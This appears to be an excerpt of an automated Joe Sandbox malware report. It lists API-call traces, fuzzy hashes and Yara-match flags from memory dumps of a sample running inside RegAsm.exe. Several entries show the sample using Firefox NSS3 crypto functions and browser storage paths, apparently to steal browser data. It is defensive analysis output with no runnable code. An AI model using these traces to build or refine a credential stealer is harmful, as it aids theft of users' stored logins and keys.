                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
• Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3989322779-0
                                                                                                                                                                                                                                                                  • Opcode ID: c4cad14657aafc5d7afdab64710582e43a4b8e1a043d51b03e29b79ec74d345d
                                                                                                                                                                                                                                                                  • Instruction ID: d124255ec461c6c0ec77bd2650810c1eed4b2c0e53f49eddb430b57c63b56ffc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4cad14657aafc5d7afdab64710582e43a4b8e1a043d51b03e29b79ec74d345d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7015EB1701B06ABEB50DF2AD908767B7E8BF10669B104839D85AD3E00EB35F055CB91
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrcatlstrcpylstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 809291720-0
                                                                                                                                                                                                                                                                  • Opcode ID: 238e1b5b11c75e3c7102c1fac72ebfe3dc1e1f24cffbe9a4b01f8ccca803e85b
                                                                                                                                                                                                                                                                  • Instruction ID: 0e42d02640ecd7300938d4a229cd94be4f65cdd59a030de616ad0f121b86e810
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 238e1b5b11c75e3c7102c1fac72ebfe3dc1e1f24cffbe9a4b01f8ccca803e85b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F015AB6900205EFCB209F99D88499AFBF5FF49350B10883EE6A9E3610C774A880CF50
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PK11_FreeSymKey.NSS3(?,6C9A5D40,00000000,?,?,6C996AC6,6C9A639C), ref: 6C9BAC2D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95ADC0: TlsGetValue.KERNEL32(?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AE10
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95ADC0: EnterCriticalSection.KERNEL32(?,?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AE24
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C93D079,00000000,00000001), ref: 6C95AE5A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AE6F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AE7F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95ADC0: TlsGetValue.KERNEL32(?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AEB1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AEC9
                                                                                                                                                                                                                                                                  • PK11_FreeSymKey.NSS3(?,6C9A5D40,00000000,?,?,6C996AC6,6C9A639C), ref: 6C9BAC44
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C9A5D40,00000000,?,?,6C996AC6,6C9A639C), ref: 6C9BAC59
                                                                                                                                                                                                                                                                  • free.MOZGLUE(8CB6FF01,6C996AC6,6C9A639C,?,?,?,?,?,?,?,?,?,6C9A5D40,00000000,?,6C9AAAD4), ref: 6C9BAC62
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
• Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1595327144-0
                                                                                                                                                                                                                                                                  • Opcode ID: ed245467a681458e2c1271d463b380a412d6a26f6d68c54e3e4b074071a4b926
                                                                                                                                                                                                                                                                  • Instruction ID: dae07adf9ae3e86d560eb49eb4ea2f25195cef39595c0219317bfa548ba2a7b0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed245467a681458e2c1271d463b380a412d6a26f6d68c54e3e4b074071a4b926
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 840178B5600200AFDB00DF19E8C0B5677ACAB24B1CF188068E8099F706EB34F808CBA1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C919003,?), ref: 6C96FD91
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970BE0: malloc.MOZGLUE(6C968D2D,?,00000000,?), ref: 6C970BF8
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970BE0: TlsGetValue.KERNEL32(6C968D2D,?,00000000,?), ref: 6C970C15
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(A4686C97,?), ref: 6C96FDA2
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,12D068C3,A4686C97,?,?), ref: 6C96FDC4
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,?,?), ref: 6C96FDD1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
• Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2335489644-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2988086103-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040B007
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: _EH_prolog.MSVCRT ref: 00410CC8
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: GetFileAttributesA.KERNEL32(00000000,?,0040BB15,?,00425C4E,?,?), ref: 00410CDC
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A9D4: _EH_prolog.MSVCRT ref: 0040A9D9
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A9D4: wsprintfA.USER32 ref: 0040AA02
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A9D4: FindFirstFileA.KERNEL32(?,?), ref: 0040AA19
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A9D4: StrCmpCA.SHLWAPI(?,00425EE4), ref: 0040AA36
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A9D4: StrCmpCA.SHLWAPI(?,00425EE8), ref: 0040AA50
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A9D4: lstrlenA.KERNEL32(00000000,00425C2A,00000000,?,?,?,00425EEC,?,?,00425C27), ref: 0040AB00
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$Filelstrcatlstrlen$AttributesFindFirstwsprintf
                                                                                                                                                                                                                                                                  • String ID: .metadata-v2$\storage\default\
                                                                                                                                                                                                                                                                  • API String ID: 2418158533-762053450
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040E0A9
                                                                                                                                                                                                                                                                    • Part of subcall function 0041E6C0: std::exception::exception.LIBCMT ref: 0041E6D5
                                                                                                                                                                                                                                                                    • Part of subcall function 0041E6C0: __CxxThrowException@8.LIBCMT ref: 0041E6EA
                                                                                                                                                                                                                                                                    • Part of subcall function 0041E6C0: std::exception::exception.LIBCMT ref: 0041E6FB
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DE98: std::_Xinvalid_argument.LIBCPMT ref: 0040DEA9
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040E104
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • invalid string position, xrefs: 0040E0A4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                                                                                                                                                                                                                                  • String ID: invalid string position
                                                                                                                                                                                                                                                                  • API String ID: 214693668-1799206989
                                                                                                                                                                                                                                                                  • Opcode ID: b3cea4396cd69cadc8cdc5d381741c8a2e82abec305105c40dc7691f631d177e
                                                                                                                                                                                                                                                                  • Instruction ID: 34cf4bff4d7cf1456674a8e46a855383a3c4a8fb9112a8d8faf89ec74adcb037
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3cea4396cd69cadc8cdc5d381741c8a2e82abec305105c40dc7691f631d177e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE110B31304260DBDB249E0ECC41A1AB3A5EF85710B100D3FF812AB2C2C7F5D861839D
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentmemcpystd::_
                                                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                                                  • API String ID: 1835169507-2556327735
                                                                                                                                                                                                                                                                  • Opcode ID: f3fc669487e3446fed126dacf7f42d121025fcc5a57803b965e043759ae16248
                                                                                                                                                                                                                                                                  • Instruction ID: 2b2c0e6bac36d119e4e60cc9da1b1e7dd44a3212a419035da328183ae0c210ee
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3fc669487e3446fed126dacf7f42d121025fcc5a57803b965e043759ae16248
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C911E9313002209BDB309E6ED940A26B7E5EF41714B100D3FF9866B2C2C7FA985587D9
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040DCF5
                                                                                                                                                                                                                                                                    • Part of subcall function 0041E6C0: std::exception::exception.LIBCMT ref: 0041E6D5
                                                                                                                                                                                                                                                                    • Part of subcall function 0041E6C0: __CxxThrowException@8.LIBCMT ref: 0041E6EA
                                                                                                                                                                                                                                                                    • Part of subcall function 0041E6C0: std::exception::exception.LIBCMT ref: 0041E6FB
                                                                                                                                                                                                                                                                  • memmove.MSVCRT ref: 0040DD2E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • invalid string position, xrefs: 0040DCF0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                                                                                                                                                                  • String ID: invalid string position
                                                                                                                                                                                                                                                                  • API String ID: 1659287814-1799206989
                                                                                                                                                                                                                                                                  • Opcode ID: 488acd1d338eb6ef0a1bb28b73d2c693d379c2b736753fd076ee43f8c7aaa6ff
                                                                                                                                                                                                                                                                  • Instruction ID: 7454e49918df775ec149311480c4d0c81d7a6f0b4424e3302c96ad14dc9cd2ab
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 488acd1d338eb6ef0a1bb28b73d2c693d379c2b736753fd076ee43f8c7aaa6ff
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9501D8317002109BD3248EE9D9C096BB7A6EFD6710770493FD442DB385DBB8EC4A87A8
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Value$calloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3339632435-0
                                                                                                                                                                                                                                                                  • Opcode ID: e3bc9d2cceda57083d1fcff23ecd596287ae36fb6307b6ee97c2040888d061b1
                                                                                                                                                                                                                                                                  • Instruction ID: 4a8520431e11487eb29c950eb49da23a5a0e93faf59d2b10bf190d8967c50c95
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3bc9d2cceda57083d1fcff23ecd596287ae36fb6307b6ee97c2040888d061b1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E310AB0606391CBDB246F38C9442797BB8BF16708F01A62DD888C7A11EB35C486CBA1